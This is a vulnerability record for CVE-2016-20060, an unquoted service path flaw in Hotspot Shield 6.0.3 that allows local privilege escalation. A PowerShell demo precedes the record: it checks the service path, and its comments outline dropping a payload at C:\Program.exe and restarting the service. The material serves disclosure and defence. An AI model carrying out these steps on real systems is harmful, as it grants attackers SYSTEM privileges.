CVE-2016-20060

# Check for unquoted service path # This script demonstrates the exploitation logic $ServiceName = "hshld" $ServicePath = (Get-WmiObject -Class Win32_Service -Filter "Name='$ServiceName'").PathName Write-Host "Current Service Path: $ServicePath" if ($ServicePath -notmatch '^".*"' -and $ServicePath -match ' ') { Write-Host "[!] Vulnerable: Unquoted Service Path detected." # Simulate dropping the payload # In a real attack, copy a malicious executable to C:\Program.exe $PayloadPath = "C:\Program.exe" Write-Host "[*] Placing malicious payload at $PayloadPath..." # Example: Copy-Item "malicious.exe" "C:\Program.exe" # Trigger service restart (requires admin usually, or wait for reboot) # Restart-Service $ServiceName Write-Host "[*] Payload will execute with SYSTEM privileges on service restart." } else { Write-Host "[+] Service path is quoted or no spaces found." }

{"cve": {"id": "CVE-2016-20060", "sourceIdentifier": "[email protected]", "published": "2026-04-04T14:16:18.757", "lastModified": "2026-04-16T16:15:56.380", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hotspot Shield 6.0.3 contains an unquoted service path vulnerability in the hshld service binary that allows local attackers to escalate privileges by injecting malicious executables. Attackers can place executable files in the service path and upon service restart or system reboot, the malicious code executes with LocalSystem privileges."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/40528", "source": "[email protected]"}, {"url": "https://www.hotspotshield.com", "source": "[email protected]"}, {"url": "https://www.hotspotshield.com/download/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/hotspot-shield-unquoted-service-path-privilege-escalation", "source": "[email protected]"}]}}